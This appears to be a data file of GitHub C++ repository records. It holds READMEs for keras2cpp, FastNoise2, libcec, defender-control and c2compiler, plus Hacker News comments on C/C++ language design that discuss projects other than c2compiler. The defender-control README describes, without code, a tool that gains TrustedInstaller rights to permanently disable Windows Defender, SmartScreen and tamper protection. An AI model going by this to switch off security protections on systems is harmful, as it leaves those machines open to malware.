Dump network into text file.\n 2. Generate random sample.\n 3. Compute predictions from keras and keras2cpp on generated sample.\n 4. Compare predictions.\n
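\nPutting steps 2 and 3 of the usage together, a minimal program might look roughly like the sketch below. The class and method names (`keras::KerasModel`, `keras::DataChunk2D`, `compute_output`) and the sample path are assumptions based on typical usage of `keras_model.h`; check `example_main.cc` for the authoritative version:\n\n```cpp\n#include <iostream>\n#include <vector>\n#include \"keras_model.h\"\n\nint main() {\n  // Load the network dumped by dump_to_simple_cpp.py\n  keras::KerasModel model(\"./example/dumped.nnet\", true);\n\n  // Read one input sample from a text file (path is illustrative)\n  keras::DataChunk *sample = new keras::DataChunk2D();\n  sample->read_from_file(\"./example/sample.dat\");\n\n  // Forward pass: returns one score per output neuron\n  std::vector<float> scores = model.compute_output(sample);\n  for (float s : scores) std::cout << s << \" \";\n  std::cout << std::endl;\n\n  delete sample;\n  return 0;\n}\n```\n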
\n## Similar repositories\n\n- Keras to C++ using the TensorFlow C API: https://github.com/aljabr0/from-keras-to-c\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Auburn/FastNoise2", "link": "https://github.com/Auburn/FastNoise2", "tags": ["noise", "noise-generator", "noise-algorithms", "simplex", "perlin-noise", "node-graph", "fastnoise", "cross-platform", "terrain-generation", "texture-generation", "simd", "procedural-generation", "magnum"], "stars": 642, "description": "Modular node graph based noise generation library using SIMD, C++17 and templates", "lang": "C++", "repo_lang": "", "readme": "[![GitHub Actions CI](https://img.shields.io/github/workflow/status/Auburn/FastNoise2/CI?style=flat-square&logo=GitHub \"GitHub Actions CI\")](https://github.com/Auburn/FastNoise2/actions?query=workflow%3ACI)\n[![Discord](https://img.shields.io/discord/703636892901441577?style=flat-square&logo=discord \"Discord\")](https://discord.gg/SHVaVfV)\n\n# FastNoise2\n\nWIP successor to [FastNoiseSIMD](https://github.com/Auburn/FastNoiseSIMD)\n\nModular node based noise generation library using SIMD, modern C++17 and templates\n\nFastNoise2 is a fully featured noise generation library which aims to meet all your coherent noise needs while being extremely fast\n\nUses FastSIMD to compile classes with multiple SIMD types and selects the fastest supported SIMD level at runtime\n- Scalar (non-SIMD)\n- SSE2\n- SSE4.1\n- AVX2\n- AVX512\n- NEON\n\nSupports:\n- 32/64 bit\n- Windows\n- Linux\n- Android\n- MacOS\n- MSVC\n- Clang\n- GCC\n\nBindings:\n- [C#](https://github.com/Auburn/FastNoise2Bindings)\n- [Unreal Engine CMake](https://github.com/caseymcc/UE4_FastNoise2)\n- [Unreal Engine Blueprint](https://github.com/DoubleDeez/UnrealFastNoise2)\n\nRoadmap:\n- [Vague collection of ideas](https://github.com/users/Auburn/projects/1)\n\n## Noise Tool\n\nThe FastNoise2 noise tool provides a node graph editor to create trees of FastNoise2 nodes. Node trees can be exported as serialised strings and loaded into the FastNoise2 library in your own code. 
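\n\nAs a rough sketch of that round trip (assuming the `FastNoise::NewFromEncodedNodeTree` factory and the `GenUniformGrid2D` call described in the project wiki; the encoded string below is just a placeholder for a NoiseTool export):\n\n```cpp\n#include \"FastNoise/FastNoise.h\"\n#include <vector>\n\nint main()\n{\n    // Deserialise a node tree exported from the NoiseTool (placeholder string)\n    auto generator = FastNoise::NewFromEncodedNodeTree(\"DQAFAAAAAAAAQAgAAAAAAD8AAAAAAA==\");\n\n    // Fill a 16x16 grid of noise values at frequency 0.2 with seed 1337\n    std::vector<float> noise(16 * 16);\n    generator->GenUniformGrid2D(noise.data(), 0, 0, 16, 16, 0.2f, 1337);\n    return 0;\n}\n```\n\n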
The noise tool has 2D and 3D previews for the node graph output; see the screenshot below for an example.\n\nCheck the [Releases](https://github.com/Auburn/FastNoise2/releases/latest) for compiled NoiseTool binaries.\n\n![NoiseTool](https://user-images.githubusercontent.com/1349548/90967950-4e8da600-e4de-11ea-902a-94e72cb86481.png)\n\n## Performance\n\nFastNoise2 has continuous benchmarking to track the performance of each node type across commits\n\nResults can be found here: https://auburn.github.io/fastnoise2benchmarking/\n\n### Library Comparisons\n\nBenchmarked using [NoiseBenchmarking](https://github.com/Auburn/NoiseBenchmarking)\n\n- CPU: Intel 7820X @ 4.9GHz\n- OS: Win10 x64\n- Compiler: clang-cl 10.0.0 -m64 /O2\n\nMillion points of noise generated per second (higher = better)\n\n| 3D | Value | Perlin | (*Open)Simplex | Cellular |\n|--------------------|--------|--------|----------------|----------|\n| FastNoise Lite | 64.13 | 47.93 | 36.83* | 12.49 |\n| FastNoise (Legacy) | 49.34 | 37.75 | 44.74 | 13.27 |\n| FastNoise2 (AVX2) | 494.49 | 261.10 | 268.44 | 52.43 |\n| libnoise | | 27.35 | | 0.65 |\n| stb perlin | | 34.32 | | |\n\n| 2D | Value | Perlin | Simplex | Cellular |\n|--------------------|--------|--------|---------|----------|\n| FastNoise Lite | 114.01 | 92.83 | 71.30 | 39.15 |\n| FastNoise (Legacy) | 102.12 | 87.99 | 65.29 | 36.84 |\n| FastNoise2 (AVX2) | 776.33 | 624.27 | 466.03 | 194.30 |\n\n# Getting Started\n\nSee [documentation](https://github.com/Auburn/FastNoise2/wiki)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Pulse-Eight/libcec", "link": "https://github.com/Pulse-Eight/libcec", "tags": [], "stars": 642, "description": " USB CEC Adapter communication Library http://libcec.pulse-eight.com/", "lang": "C++", "repo_lang": "", "readme": "![Pulse-Eight logo](https://pulseeight.files.wordpress.com/2016/02/pulse-eight-logo-white-on-green.png?w=200)\n\n# About\nThis library provides support for Pulse-Eight's USB-CEC adapter and other CEC capable hardware, like the Raspberry Pi.\n\nA list of FAQ (Frequently Asked Questions) can be found on [libCEC's FAQ page](http://libcec.pulse-eight.com/faq).\n\n.Net client applications, previously part of this repository, have been moved to [this repository](https://github.com/Pulse-Eight/cec-dotnet).\n\n# Supported platforms\n\n## Linux & BSD\nSee [docs/README.linux.md](docs/README.linux.md).\n\n## Apple OS X\nSee [docs/README.osx.md](docs/README.osx.md).\n\n## Microsoft Windows\nSee [docs/README.windows.md](docs/README.windows.md).\n\n# Supported hardware\n* [Pulse-Eight USB-CEC Adapter](https://www.pulse-eight.com/p/104/usb-hdmi-cec-adapter)\n* [Pulse-Eight Intel NUC CEC Adapter](https://www.pulse-eight.com/p/154/intel-nuc-hdmi-cec-adapter)\n* [Pulse-Eight CEC Adapter for Skull Canyon and Hades Canyon NUC systems](https://www.pulse-eight.com/p/207/skull-canyon-nuc-cec-adapter)\n* [Raspberry Pi](https://www.raspberrypi.org/)\n* Some Exynos SoCs\n* NXP TDA995x\n* Odroid C2 (Amlogic S905)\n\n# Developers\nSee [docs/README.developers.md](docs/README.developers.md).\n\n
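For a flavour of what a client looks like, here is a rough sketch (the `CECInitialise`, `DetectAdapters`, `Open` and `PowerOnDevices` calls are assumptions drawn from libcec's C++ headers; see the developer docs above for the real API):\n\n```cpp\n#include <libcec/cec.h>\n#include <cstdio>\n\nint main()\n{\n    // Describe this client to libcec\n    CEC::libcec_configuration config;\n    config.Clear();\n    snprintf(config.strDeviceName, sizeof(config.strDeviceName), \"demo\");\n    config.clientVersion = LIBCEC_VERSION_CURRENT;\n    config.deviceTypes.Add(CEC::CEC_DEVICE_TYPE_PLAYBACK_DEVICE);\n\n    // Initialise the library and open the first detected adapter\n    CEC::ICECAdapter* adapter = CECInitialise(&config);\n    CEC::cec_adapter_descriptor devices[1];\n    if (adapter && adapter->DetectAdapters(devices, 1, nullptr, true) > 0 &&\n        adapter->Open(devices[0].strComName))\n    {\n        adapter->PowerOnDevices(CEC::CECDEVICE_TV); // wake the TV\n        adapter->Close();\n    }\n    if (adapter) CECDestroy(adapter);\n    return 0;\n}\n```\n\n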
# Vendor specific notes\n\n## Panasonic\n* On Panasonic TVs, to enable the media control buttons on the bottom of the remote, you may have to change the operation mode. To change it, press the bottom Power button, keep it pressed, and press 7 3 Stop. After releasing the Power button, Play, Pause, etc. should work in XBMC.\n\n## Raspberry Pi\n* If your TV cannot detect the Raspberry Pi's CEC, or if the Pi can't detect the TV, try adding the following line to `/boot/config.txt` and rebooting the Pi: `hdmi_force_hotplug=1`\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "qtkite/defender-control", "link": "https://github.com/qtkite/defender-control", "tags": ["windows", "defender"], "stars": 642, "description": "An open-source windows defender manager. Now you can disable windows defender permanently. ", "lang": "C++", "repo_lang": "", "readme": "# Defender Control\r\nOpen-source Windows Defender disabler. \r\nNow you can disable Windows Defender permanently! \r\nTested on Windows 10 20H2. \r\nAlso working on Windows 11* \r\n\r\n## What is this project? \r\nWe all know that disabling Windows Defender is very difficult since Microsoft is constantly enforcing changes. \r\nThe first solution is to install an anti-virus - but that's not the point if we are trying to disable it! \r\nThe next easiest solution is to use freeware that's already available on the internet - but none of them are native & open source... \r\nI like open source, so I made a safe-to-use, open-source Defender control. \r\n\r\n## On Windows updates / Windows 11\r\nSometimes Windows decides to update and turn Defender back on. \r\nA common issue is that Defender Control sometimes doesn't want to disable tamper protection again. \r\nPlease try turning off tamper protection manually, then running disable-defender.exe again before posting an issue. \r\n\r\n![Tamper](https://github.com/qtkite/defender-control/blob/main/resources/tamper.png?raw=true)\r\n\r\n## What does it do?\r\n1. It gains TrustedInstaller permissions\r\n2. It disables Windows Defender services + SmartScreen\r\n3. It disables anti-tamper protection\r\n4. It disables all relevant registry keys + WMI settings\r\n\r\n## Is it safe?\r\nYes, it is safe; feel free to review the code in the repository yourself. \r\nAnti-virus & other programs might flag this as malicious since it disables Defender - but feel free to compile it yourself using Visual Studio.\r\n\r\n## Compiling\r\nOpen the project using Visual Studio 2022 Preview. \r\nSet the build to Release and x64. \r\nChange the build type you want in settings.hpp. \r\nCompile. \r\n\r\n## Demo\r\n![Demo](https://github.com/qtkite/defender-control/blob/main/resources/demo.gif?raw=true)\r\n\r\n## Release\r\nYou can find the first release over at the releases on the right. \r\nOr alternatively click [here](https://github.com/qtkite/defender-control/releases/tag/v1.2).\r\n\r\n## Windows 11\r\nWorks for earlier versions of Windows 11. 
The correct registry keys have not been added yet for the latest version.\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "c2lang/c2compiler", "link": "https://github.com/c2lang/c2compiler", "tags": ["programming-language", "c", "c2", "compiler"], "stars": 641, "description": "the c2 programming language", "lang": "C++", "repo_lang": "", "readme": "# C2Compiler\n\nPlease see [C2Lang.org](http://c2lang.org) for more info about C2!\n\nThe C2 project attempts to create a new language, strongly based on C.\nIn a nutshell, the main differences with C are:\n* no more header files (too much typing)\n* no includes\n* packages (needed if we can't have includes)\n* compiled per target (not per file)\n* more logical keywords (public/local replaces static)\n* integrated build system\n\nBelow are the instructions for building and using the C2Compiler.\n\nHave fun! (and code..)\n\n\n## Generic\nC2 is based on LLVM 7.0 and some parts of Clang 7.0. The design of C2C's\nParser and ASTBuilder classes is heavily based on Clang's Parser and Sema classes,\nso hereby my thanks to the Clang folks!\n\n\n## What needs to be done\nA short list of open items (the full list would probably fill up GitHub) with\ntheir priority:\n* [high] c2c: parse full syntax into AST (ALMOST DONE)\n* [high] c2c: generate IR code for more AST elements\n* [medium] tool: create graphical refactor tool (c2reto) (IN PROGRESS)\n* [medium] c2c: tab completion on targets in recipe / cmdline args\n* [medium] tool: create a C parser for parsing C headers.\n* [medium] tool: create c2format - astyle for C2.\n* [low] tool: c2grep - grep only files in recipe\n\n\n## Installation\nRead the [installation document](INSTALL.md) for installation on Linux or OSX. For\nWindows installation, see the [windows installation document](INSTALL_WIN.md).\n\n## Using the C2 compiler\nBy default, c2c will only parse and analyse the targets. Generating C code\nshould work on all examples, but generating LLVM's IR code is work in\nprogress. In the examples directory (or add `-d examples/`):\n```\nc2c multi\nc2c hello\nc2c puzzle\nc2c -I working_ir\n```\n\nIt's also possible to manually compile a single .c2 file without a recipe\nfile with:\n```\nc2c -f <file.c2>\n```\n\nTo generate ANSI-C code, use:\n```\nc2c -C <target>\n```\n\nThe C2 compiler is able to generate a package dependency file in dot format. This\nfile can be converted into a PNG as follows:\n```\nc2c --deps <target>\ndot -T png output/target/deps.dot > image.png\n```\n\nTo see all available options, run:\n```\nc2c -h\n```\n## c2tags\n**c2tags** is C2's version of ctags. This tool is used by vim (among others) to \"jump to\ndefinition\". See the [installation document](INSTALL.md) on how to install.\n\nHow it works is as follows:\n* use --refs or add $refs in recipe.txt to generate a **refs** file during compilation.\n* c2c generates a **refs** file per target. This file contains all references\n and their respective destinations.\n* c2tags currently doesn't have a full-blown vim-plugin yet, but a small\n code-fragment in your .vimrc should suffice.\n* Pressing ctrl-h (configurable) with your cursor on any symbol\n will jump to its definition. 
Pressing ctrl-o (default) will jump back.\n\nJust like **c2c** itself, **c2tags** can be called from any (sub)directory in the\nproject tree.\n\n", "readme_type": "markdown", "hn_comments": "For a while now I have wondered if compiling an average Linux system with AOCC, AMD's Optimized C/C++ Compiler would have a noticeable effect for a system using one of AMD's APUs.In the libreoffice project, we have implemented some of this eg. no c style casts, using clang plugins, which avoids needing a custom build of clang. But always good to see people experimenting in this space!All non-void return values should be [[nodiscard]] by default. Of course then you will need something else ([[discardable]]?) to indicate the ones that may safely be ignored.I really do not understand the Rust-esque love of the \"mutable\" keyword in rebellion of \"const\". They are most often attached to variables. The definition of the word variable is \"subject to variation or changes\". By definition, variables change. Constants do not change. I understand that the semantics here are historical, but it's very much like \"Automated ATM Machine\". Maybe I just don't like the word mutable, and would prefer \"var\" or \"varying\".I'm not sure about explicit braces for cases in `switch`. I think what Swift does is pretty neat: each case breaks by default, so you don't have to write `break;`, instead you have to write `fallthrough` to explicitly allow them falling through.One suggestion: In documentation and comments, distinguish clearly between \"const\" and \"constant\".\"const\" means \"read-only\", and probably should have been spelled \"readonly\".\"constant\", as in \"constant expression\", means evaluated at compile time.For example: `const int r = rand();` is perfectly valid: r can't be computed until run time (it's not constant), but it can't be modified after its initialization (it is const/readonly).> - All basic types (excluding pointers and references) are const by\n default and may be marked 'mutable' to allow them to be changed after\n declarationIf you're not changing how const works, then this has limited utility in C++ because C++ const has all sorts of problems (e.g. not transitive). Also, what does the \"mutable\" annotation for a free function (i.e. main) mean? That just seems weird.> - Lambda capture lists must be explicit (no [&] or [=], by themselves)[&] is pretty valuable in cases where you do something like invokeSynchronously([&] {...})I don't know that your changes will ever see much adoption because it won't be able to compile anything more complex than a \"hello world\" program as all the things you disallow are used & the porting effort is not cosmetic. Additionally, you're not actually fixing any of the problems people have with C++. So:1. Consider fixing const semantics if you're going down the path of defining a new language2. Think about how to fix memory safety and issues around UB which are the #1 sharp edges for C++I don't know if you're achieving the goal of a safer, less error-prone language with the changes outlined. Have you looked at the things Carbon [1] is doing? I'd say that's an attempt to define a spiritual successor to C++, one that can easily interoperate with C++ but when you stay within the language it's safer.[1] https://github.com/carbon-language/carbon-langApart from the mutable keyword, can't these be implemented as a clang diagnostic plugin? Then it can be used to enforce a stricter style guide. 
As another commenter pointed, mutable will be probably of limited use anyway.This is a really great idea, specially if you can write a transpiler from general C++ into modified C++ (it can error out on corner cases and ask for manual intervention, but trivial stuff like adding missing braces can and should be done by an automatic tool, like rustfix is used to migrate between Rust editions https://github.com/rust-lang/rustfix)But here you didn't tackle the main thing: a plan to make simple business logic not corrupt memory and cause havok with UB! Dereferencing arbitrary pointers is a dangerous operation that shouldn't be done in everyday code. If I'm writing data structures I'm willing to think about UB, but if I'm choosing the color of a widget I'm less so. I'm not expecting you solve this hard problem, but at least a general direction or a half solution that works for a % of the cases would be cool (or at least state this is a long term goal).And of course there's the comparison to Rust, but Rust is actually just a data point in this solution space and perhaps new languages can afford to try new approachesWithout an Issue tracker on the GH fork it will be hard to add ideas.I would add: removing Unicode identifiers, because identifiers are meant to be identifiable.what's the motivation for removing `goto`, is this something that you find being abused? I code in c++ for work, and I almost never see anyone using it without a good reason.Could you please write a translator, that would convert into the modified syntax instead of emitting an error?Add something like a break_n/break_label that allows for leaving a loop from a switch statement. Or allow goto in that limited case.const-by-default is definitely nice. Does this extend to both sides of a pointer type? Does int * refer to int const * const?There is nothing wrong with [&] for short-lifetime lambdas. Lambdas passed to std algorithms or immediately invoked lambdas come to mind.edit:Are data members also const by default? How do I declare a non-const data member that is const when accessed within a const member function? (so non-const non-mutable in original c++)Ok some more suggestions:\n- Pointers aren't arrays.\n- no implicit conversions at all.\n- require fields to be initialized before use/end of constructorI think you might be onto something with regards to the general idea, but most of your particular rules I disagree with. vector for example is very strange; there's no reason vector shouldn't work. With respect to lambda captures always being explicit, it's a far heavier restriction than you (and many) people realize\u2014sometimes you literally cannot know what's inside the lambda to be able to capture it (look up the SCOPE_EXIT macro as just one example), and even when you can, listing all of them is sometimes far more harmful to readability than helpful\u2014it depends strongly on the situation. Goto is absolutely necessary in certain rare but practical cases too\u2014like when converting a recursive algorithm to an iterative one without breaking git blame. C-style casts to (void) are pretty useful, so you'd need at least an exception for that.Constructors being explicit by default I 100% agree with, and there are other rules I could come up with too, but in general, you need to realize that a lot of the features in the language have legitimate use cases that you might simply have a hard time imagining. 
Therefore, coming up with useful rules without hampering useful functionality requires both (a) experience & playing around with the language to a greater extent than you might at your job, and (b) a great deal of thought on top of that.How about making atomics mutable through const&, adding move-by-default, and marking all constructors (value, conversion, and copy) as explicit aside from move, and probably add explicit copy assignment as well?> All basic types (excluding pointers and references) are const by\ndefault and may be marked 'mutable' to allow them to be changed after\ndeclarationFWIW, for me, this is an anti-feature, and I would not use this language because of it. The net effect of this would be that I type \"mutable\" all over the place and get very little for my effort.I've spent a significant amount of time understanding what the high-consequence programming errors that I make are, and \"oops, I mutated that thing that I could have marked const\" is a class of error that consumes a vanishingly small amount of my debugging time.The errors I make that account for a large portion of my debugging time are errors related to semantics of my program. Things that, in C++, are typically only detectable at runtime, but with a better type system could be detected at compile time. The first step for this might be type annotations that specify valid values. For example, being able to annotate whether an argument is or is not allowed to be null, and having that enforced at call sites.(NOTE: I also don't spend a meaningful amount of time debugging accidental nullptr values, but that's a good first step towards the type annotations I _do_ want)I think this is an interesting idea but I also think it will never gain adoption.Move constructors/Move assignment should be noexcept by default. It's not entirely clear to me what a program ought to do if a move constructor/assignment operator throws an exception. In a general sense you cannot 'trust' the old object to not have been modified.\"All basic types (excluding pointers and references) are const by default\" -- why the exception?The rule of zero should be acceptable in addition to the rule of 6. Also, the rule of 5 is acceptable in many circumstances; lots of classes should not have default constructors. I agree that having 1,2,3, or 4 are bad, but 0,5,6 are acceptable.Couldn't most of these be covered by a linter? I'm not sure you really need a new language for this. Even right now in Visual Studio resharper is constantly telling me about things that can be constexpr or const and a lot of the other things you mention here.IMO it would help adoption if you supply a clang-powered rewriter into and out of your language variant. It allays the fear of losing your codebase if the compiler project dies.Reverse the default for typename. Currently some_class::thing is assumed to be an expression where 'thing' is a variable, when we don't know which template pattern to use because there may be an explicit specialization on the T that the user chooses. Hence, we have to say \"typename std::vector::iterator it;\" instead of just saying \"std::vector::iterator it;\". Instead, reverse that and assume it's a type by default unless shown that it's an expression. You'll need a new keyword for that, replacing \"typename\".Remove the promotion-to-int rules. 
Currently in C (and in C++) unsigned short test(unsigned short a, unsigned short b, unsigned short c) {\n unsigned short x = a * b * c;\n return x;\n }\n\ncan have UB as signed integer overflow because any math done on an object smaller than int gets promoted to int. (No, you can't fix this with \"(((unsigned short)x) * ((unsigned short)y))\"; the promotion happens on *'s LHS and RHS, if those have types smaller than int.) Beyond this, people seem to expect that the type of the variable declaration will appertain to the calculation on the right, but it doesn't. For instance people seem to think \"float f = a + b;\" can't overflow where 'a' and 'b' are ints, because the assignment is going into a float.\n\nI haven't thought this idea through completely yet. Extend pointer types to include a static allocation identity as part of the type. Address-of a local variable or global variable should produce one of these pointers. A \"static allocation identity\" is a special-typed zero-size variable, so you can stick it in code or as a class member. You could have pointers that were guaranteed to be allocated by THIS allocation point, instead of pointing to every possible T in the program. I'll fake up a syntax, \"tree_node ^ tree::node_alloc\". It's known not to alias any other tree_node the program might have; it has to be attached to the allocation point owned by that specific \"node_alloc\" in that object. (Let me phrase it differently. A tree in C or C++ has pointers which can point anywhere as long as it's another tree node type. That could be pointing to a different tree, it could be a self-pointer, it could be pointing up the tree, and so on. If your tree_node class has an allocation root, you can say that the pointers are things allocated through this allocation root. They can not outlive the allocation root. They are distinct from the things allocated by other allocation roots, which are the same tree_node types, but different tree_node objects. The node's list of children is std::vector<tree_node ^ tree::node_alloc> so it clearly only holds pointers it allocated itself.)\n\nThere's another problem with pointers related to the above. Some code I saw used a \"T &get_or_default(Container &c, K key, V &default);\" and the problem was that people would call it with a temporary for the default, like \"Value &x = get_or_default(mymap, key, Value());\" and they'd be holding a dangling reference. If you could make that an error, that'd be great. Maybe we use a trick like the \"allocation root\" above and treat pointers or references to temporaries as having a different type from the local variable. Then get_or_default takes and returns a reference-to-temporary and attempting to assign that to a reference in a variable declaration fails. Unlike the previous \"allocation root\" idea where you indicate the only thing you accept, this would be a case where you accept all allocation roots except one, the \"temporaries\" allocation root.\n\nAs far as I know, no compiler takes advantage of the freedom of the order of operations except in the most trivial ways. Everyone knows that in \"f() * g() + h()\" the * must happen before the +, but people think this means that f() and g() must happen before h(). No, they may happen in any order at all. I had to fix a lot of code that did \"Print(stream.read(), stream.size())\" where \"read\" updates the pointer and leaves size == 0: gcc ran stream.size() first and clang ran stream.read() first, setting the subsequent size to zero. Similar issue with \"expr1() = expr2();\" expressions.
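\n\nTo make the promotion-to-int trap above concrete, a minimal sketch (assuming 32-bit int; square/square_safe are hypothetical helpers, not from the thread):\n\n // Every operand promotes to (signed) int, so the multiply can overflow\n // int: undefined behavior even though every declared type is unsigned.\n unsigned short square(unsigned short v) {\n return (unsigned short)(v * v); // UB for v > 46340 with 32-bit int\n }\n\n // The portable fix: widen to an unsigned type before multiplying.\n unsigned short square_safe(unsigned short v) {\n unsigned int w = v; // value-preserving, well defined\n return (unsigned short)(w * w); // wraps mod 2^32, then truncates\n }\n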
\n\nExtend switch() and case to work on objects with any operator== defined. Add a statement for fallthrough and default to 'break;' before the start of the next case-label. Give each case label its own scope so I can declare variables in there without adding my own curly-braces. (Bonus 1: can you design a way to ensure that case labels are not overlapping? May require something other than operator==. Bonus 2: can you allow cases to be structured binding matches, similar to Rust?)\n\nSpeaking of structured binding, it's great but doesn't allow nesting. This std::vector<std::pair<std::string, std::pair<int, int>>> v;\n for (auto [name, [lhsid, rhsid]] : v) {\n\nis code I actually wanted to write in the past week, yet that's a syntax error.\n\nAdd the ability to declare object inheritance (\"class Derived : Base;\") so that I can cast between them before writing out the body of the derived class. Also allow me to write out the entire class tree with no possibility for extension in another translation unit. The \"final\" keyword states that a class may not be derived from, but I usually have a Base class which does have subclasses, but a known list of subclasses that will never grow without recompiling the whole project. Currently the compiler has to assume I could write a new subclass and compile it into a shared object that the existing program dlopen's, and the existing program will work. It's crazy. No, I have the final tree, not just some leaf classes; please devirtualize the whole thing for me.\n\nAre ABI changes on the table? Explicit template instantiations and explicit specializations should mangle differently. See my comment elsewhere: https://github.com/dealii/dealii/issues/3705#issuecomment-11...\n\nIf I think of some more, I'll reply to myself.\n\n- define the evaluation order for function parameters, e.g. f(a(), b()) [or is that well defined in modern C++?]\n- allow for named arguments. E.g. let's say for the definition f(int a = 12, int b = 42), one might call f(b: 1337) or f(12, 1337). Not allowing mixing of named & positional is probably a good idea.\n\n//Edit: as others have said, try to whack as much undefined behaviour as possible (and in case you can't, don't accept the input program).\n\nRather than build a new compiler, I wonder if this might be easier to integrate as a static checker. IMO clang static checks are not that difficult to write. The hardest thing can be the query to find the interesting elements. But you're banning/requiring fairly high-level language elements so they should be pretty easy queries to write.\n\nI think it's a great experiment, keep doing what you're doing. Removing the footguns from C++ without wildly changing the syntax up is a solid idea.\n\nHow hard would it be to automatically convert some existing C++ into the new language? It seems like your compiler can diagnose the errors, so inserting `mutable` and `bool(...)` should be possible.\n\nIt might be interesting to do this on an existing codebase just to see where mutable is needed.\n\nAside - Documentation says:\n\n> It is possible to cast the variant type to any pointer type, which will return null if the types match, or the pointer value otherwise.\n\nThat seems backwards to me. Maybe it's just me? 
Surely if the types match that's when we get the pointer value ?My main point - StringsI think at this point good strings are table stakes. If you're a general purpose language, people are going to use strings. Are they going to make a hash table of 3D vectors? Maybe. Are they going to do finite field arithmetic? Maybe. Are they going to need networking? Maybe. But they are going to use strings. C's strings are reprehensibly awful. C++ strings are, astoundingly, both much more complicated and worse in many ways, like there was a competition. You need to be doing a lot better than that IMHO.I happen to really like Rust's str but I'm not expecting to see something so feature rich in a language like C3. I am expecting a lot more than from a fifty year old programming language though.Looks interesting, thanks! Just curious, any plans for supporting SIMD, similar\nto gcc's vector extensions ?This looks awesome! The main thing holding me back from switching from C++ to C is the lack of type safe generic programming. This language looks like it not only solves that, but adds some other interesting features like defer that I've been wanting to try out :D. It looks like there are some examples of large projects getting successfully compiled by C3 (the vkDoom).Since this is still only alpha 0.2, I'm curious how stable the compiler is and whether the core language features are subject to change? I'd love to start using this on some projects, but I'm always afraid to adopt a language in its early stages.Looking at the primer... // C\n typedef struct\n {\n int a;\n struct \n {\n double x;\n } bar;\n } Foo;\n\n // C3\n struct Foo\n {\n int a;\n struct bar \n {\n double x;\n }\n }\n\nVery confused by this. The C code declares an anonymous struct type, then aliases the typename \"Foo\" to that anonymous struct type. The C3 code seems to declares a named struct type \"Foo\" -- why isn't the C equivalent here just \"struct Foo\"?But then within the struct it gets weirder... the C code declares a second anonymous struct, and then declares a member variable of that type. The C3 code... declares a struct named \"bar\" and also a member variable with name matching the type? Except the primer says that these are equivalent, so the C3 code is declaring an anonymous struct and a member of that type? Using the same syntax as the outer declaration did to declare a named type but no (global) variable?? Is this case sensitive?I don't think I can get further into the primer than this... even taking the author at their word that the two snippets are equivalent, I don't understand what's in play (case sensitivity? declarations where variable name must match type name?) to make this sane, and there's zero rationale given for these decisions.what is it with fn()? If we are so much into being terse then int abc() should be just fine. If we need readability than function() instead of fn() would do better.In my experience of using D at work alongside people who barely know how to program (i.e. smart but not culturally a Dev), and people who just didn't know D: if you have smart devs simplicity doesn't matter very much.If anything it's easier to teach a concept than wait for a programmer to be able to see through a wall of messy simplicity.A big win C3 explicitly opts out of are integer types named by their size such as u8/u16/u32/.., yet explicitly sizes the types it does have. 
Another sore point in C: how do expressions involving different integer types work?Just take C, remove the integer promotion and implicit casts (it means casting constant literals, yes), except for void* ofc. Remove those horrible __thread, generic, typedef (use the preprocessor for function types?), restrict, all optimization \"hints\", etc keywords. Finally standardize properly the preprocessor macro with a variadic number of arguments... Split completely the syntax definition from the the runtime lib (the main() function, etc).It seems there is more to remove from C than to add.Holy crap I\u2019ve been wanting to make basically this exact language for a while now: C with modules and defer!I am wondering how strings are represented (I dislike the sentinel value scheme we have now), and what the library/locale situation is like (hoping it just says everything is UTF8).Awesome that someone went and did it for me! The one thing I don\u2019t like is the fn declaration, but reading other comments it makes sense why it\u2019s there and I\u2019m sure I\u2019ll get used to it.Should compare with DasBetterC too!https://dlang.org/spec/betterc.htmlAwesome stuff. It seems like a C+ instead of C++ to me.I wish it has class/object/ctor/dtor/RAII though, no need for exception. OOD in C using struct and function pointers are doable but is a bit cumbersome. I don't even need runtime overloading or virtual inheritance or any fancy/advanced features of c++, just a better way to organize code in an OOD style is enough, something like Javascript's class sugar syntax to its prototype object syntax(here will be c++ style to struct+function-pointer-style).I think we do need a language like this, and that Zig/Odin/Myrddin/etc have the issue of having a syntax too different from C (Zig being the least offending; Hare is okay but perhaps a bit too minimal). This is great. Are there plans for a package manager? What's the target stdlib size?That said, I'm not a big fan of the naming. It irrationally feels kinda hard to justify using a language called \"C3\" (and I also irrationally like cute names and mascots like Hare has).> requiring `fn` in front of the functions. This is to simplify searching for definitions in editors.You don't have to do that even in C, you can use this style for function defs static int\n myfunc(...)\n {\n ...\n }\n\nand search or grep for ^myfunc\\(\n\nto isolate the definition as opposed to the use.Hey, I like any language with this kind of goto:http://www.c3-lang.org/statements/#nextcase-and-labelled-nex...> It's also possible to use nextcase with an expression, to jump to an arbitrary case: switch (i)\n {\n case 1:\n doSomething();\n nextcase 3; // Jump to case 3\n case 2:\n doSomethingElse();\n case 3:\n nextcase rand(); // Jump to random case\n default:\n libc::printf(\"Ended\\n\");\n }\n\n> Which can be used as structured goto when creating state machines.Glanced. 17 or 18 years ago I implemented my own programming language too so I can only say: keep on. Just a quick note in terms of Art and Beauty: what I expect from a new language is expressiveness, and encouragement of good programming techniques, so that a code written by an average programmer in the worst mood would not look as a total mess.I'm puzzled with what the market for these kinds of languages are.C is sort of a dead end. There is very little innovation there. And that's fine; the users of the language seem to want it that way. They just want to write software the same way they've been doing for the last 20 years. 
Why would such a conservative user base want to switch to a different language like C3?Linus once said this about Subversion: \"Subversion has been the most pointless project ever started... Subversion used to say, 'CVS done right.' With that slogan there is nowhere you can go. There is no way to do CVS right.\" Could C3 be the Subversion of programming languages?You'll probably get varying answers to your question based on who you ask, but I would recommend developing an expertise in one particular area -- perhaps in one individual project, or even a subcomponent of a project -- that you care about and will naturally develop an encyclopediac knowledge of simply because you find it fascinating enough to want to read everything about it (historic and ongoing).So now you're an expert in that field - and it doesn't feel like work, because it's what you enjoy and want to see advance technologically. Now what you do is look around to see who benefits from experience in that area. If you're lucky, they've reached out to you already.Worst case, you've learned about and perhaps developed and furthered a technology cause that you care about. Best case, you've found an employer (and team) who want to do the same.What's your favourite example of a static analysis success story?> Some recent examples of such low-level work I can think of, are: Linux kernel development, sanitizers and static analysis in GCC and Clang, new languages and their compilers and tools (Rust, Go, WebAssembly, etc), regular improvements in web browser engines, databases features.All that you have listed are available for contributions from 